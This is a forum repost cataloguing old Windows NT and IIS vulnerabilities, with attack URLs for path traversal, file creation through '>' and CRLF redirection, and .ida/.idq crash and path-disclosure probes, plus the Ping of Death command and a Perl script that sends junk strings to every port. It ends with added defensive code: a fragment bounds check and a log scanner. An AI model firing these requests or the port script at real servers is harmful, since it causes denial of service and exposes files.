Title: NT vulnerabilities and their descriptions (English)
Author: 雜七雜八   Time: 2011-1-13 17:12

Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------

Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'. The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";    # old chat library that shipped with the Perl distribution of the day

# first argument is the host to test
$systemname = shift @ARGV or die "usage: perl poke servername\n";

$verbose = 1;      # tell me what you're hitting
$knownports = 1;   # don't hit the known problem ports (53, 135, 1031)

# the original read '$port = $0', which is the script name, not a number; start at 1
for ($port = 1; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;   # nothing listening or connection refused: skip instead of dying
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
/*end poke code*/

Save the above text as c:\perl\bin\poke, and run it like this: C:\perl\bin> perl poke servername
--------------------------------------------------------------------------------

Affected systems: 4.0

Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr>, will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
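The reason a 65527-byte ping is dangerous is arithmetic: 65527 bytes of ICMP data plus the 8-byte ICMP header plus the 20-byte IP header is 65555 bytes, more than the 65535 that the 16-bit IPv4 total-length field can express, so the last fragment's offset plus its length runs past any correctly sized reassembly buffer. The following is an added example, not code from the post, showing the per-fragment bounds check a reassembly layer must apply before copying fragment data; the MTU of 1500 and the fragment layout are assumptions mirroring a plain Ethernet link, not values from the post.

```python
"""Added example (not from the original post): the bounds check an IP
reassembly layer must perform to reject an oversized ICMP echo request
("Ping of Death"). MTU and fragment layout are assumptions for the demo."""

IP_HEADER_LEN = 20       # IPv4 header without options
ICMP_HEADER_LEN = 8      # ICMP echo request header
MAX_DATAGRAM = 65535     # largest value the 16-bit IPv4 total-length field can hold
MAX_PAYLOAD = MAX_DATAGRAM - IP_HEADER_LEN   # 65515 bytes may follow the IP header


def fragments_for_ping(data_len, mtu=1500):
    """Describe the IP fragments a sender emits for an ICMP echo carrying
    data_len bytes of padding (what 'ping -l data_len' asks for). Returns
    (offset_bytes, length, more_fragments) tuples; all but the last fragment
    carry a multiple of 8 bytes, as IPv4 requires."""
    payload = ICMP_HEADER_LEN + data_len
    per_frag = (mtu - IP_HEADER_LEN) // 8 * 8     # 1480 bytes for an MTU of 1500
    frags = []
    offset = 0
    while offset < payload:
        length = min(per_frag, payload - offset)
        more = offset + length < payload
        frags.append((offset, length, more))
        offset += length
    return frags


def reassembled_payload_length(frags):
    """Payload length the fragments claim: the end of the furthest fragment.
    The sender controls this, so it must be validated, not trusted."""
    return max(off + ln for off, ln, _ in frags)


def accept_fragment(offset_bytes, length):
    """Check a single fragment *before* copying it into the reassembly buffer:
    its end must lie within the largest legal datagram payload. Stacks that
    crashed on the Ping of Death copied first and checked never."""
    return offset_bytes + length <= MAX_PAYLOAD


def is_ping_of_death(frags):
    """True if any fragment of the echo request would overflow the buffer."""
    return any(not accept_fragment(off, ln) for off, ln, _ in frags)


if __name__ == "__main__":
    # -l 65527 is the size from the post; 65500 is the largest legal padding
    for data_len in (32, 65500, 65527):
        frags = fragments_for_ping(data_len)
        print(f"-l {data_len}: {len(frags)} fragments, claimed payload "
              f"{reassembled_payload_length(frags)}, oversized={is_ping_of_death(frags)}")
```

The last fragment of the 65527-byte ping sits at offset 65120 and carries 415 bytes, so it ends at byte 65535 of the payload, 20 bytes past what fits behind an IP header; a 65500-byte ping ends at 65508 and is accepted, which is also why later ping implementations cap -l at 65500.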
--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a denial of service against the server). Vulnerable are all IIS versions up to and including IIS 5.0. When a remote attacker issues a request with the malformed URL

http://www.example.com/...[25kb of '.']...ida

the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive) by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as:

http://www.microsoft.com/anything.ida

or:

http://www.microsoft.com/anything.idq

a remote user will get a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response allows him to gain further knowledge of how the web site is organized and the directory structure of the server.
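Every request shape in this post leaves a recognisable trace in the web server's access log: the '..\..' and 'scripts..\..' traversals, the '>' and '%0A%0D>' redirection into a file, the '.ida'/'.idq' path probes and the oversized '.ida' URL. The following is an added example, not code from the post, that scans IIS-style log lines for those shapes from the defender's side. The log format (time, client, method, URI, status), the sample lines, the 1024-byte "oversized" threshold and the rule names are all constructed for the example.

```python
"""Added example, not part of the original post: flag the request shapes the
post describes (backslash/dot-dot traversal, '>' output redirection, CRLF in
the path, .ida/.idq probes, oversized URLs) in constructed IIS-style log lines."""
import re
from urllib.parse import unquote

LONG_URL = 1024   # assumed threshold; the .ida failures in the post involved ~25 KB paths

# Matches a '..' path segment once backslashes have been folded to '/'
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

# Constructed sample log: "time client method uri status", one request per line
SAMPLE_LOG = (
    "10:01:02 198.51.100.7 GET /index.htm 200\n"
    "10:01:05 198.51.100.7 GET /..\\..\\winnt\\system32\\file.txt 200\n"
    "10:01:09 198.51.100.7 GET /scripts..\\..\\scriptname 200\n"
    "10:01:12 198.51.100.7 GET /scripts/exploit.bat>c:\\inetpub\\target.bat 200\n"
    "10:01:15 198.51.100.7 GET /scripts/script_name%0A%0D>target.bat 200\n"
    "10:01:20 198.51.100.7 GET /%2e%2e/%2e%2e/file.txt 404\n"
    "10:01:25 198.51.100.7 GET /anything.idq 404\n"
    "10:01:30 198.51.100.7 GET /" + "." * 30000 + ".ida 500\n"
    "10:01:35 203.0.113.9 GET /products/list.asp 200\n"
)


def findings_for_uri(uri):
    """Return the names of the rules a single request URI trips, in rule order."""
    hits = []
    decoded = unquote(unquote(uri))        # second pass catches double encoding
    folded = decoded.replace("\\", "/")    # so '..\..' and '../..' look the same
    if TRAVERSAL.search(folded):
        hits.append("path-traversal")      # '/..\..' and 'scripts..\..\name'
    if ">" in decoded:
        hits.append("output-redirection")  # 'script_name>PATH\target.bat'
    if "\r" in decoded or "\n" in decoded:
        hits.append("crlf-in-path")        # 'script_name%0A%0D>...'
    if folded.lower().rsplit("?", 1)[0].endswith((".ida", ".idq")):
        hits.append("ida-idq-probe")       # path disclosure / crash probe
    if len(uri) > LONG_URL:
        hits.append("oversized-url")       # the 25 KB '.ida' request
    return hits


def scan_log(log_text):
    """Parse the constructed log format and return one alert per offending line."""
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue                       # blank or malformed line
        when, client, method, uri, status = parts
        hits = findings_for_uri(uri)
        if hits:
            alerts.append({"time": when, "client": client, "method": method,
                           "status": status, "uri": uri[:60], "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['time']} {alert['client']} {', '.join(alert['rules'])}: {alert['uri']}")
```

Decoding before matching matters: the '%2e%2e' and '%0A%0D' forms are invisible to a plain substring search on the raw URI, and folding backslashes to slashes is what lets one rule cover both the '..\..' spelling in this post and the '../..' spelling a Unix-minded scanner would expect. A crashed server may never log the request that killed it, so for the crash cases this detection is a signal from the attempts that preceded the crash rather than from the fatal request itself.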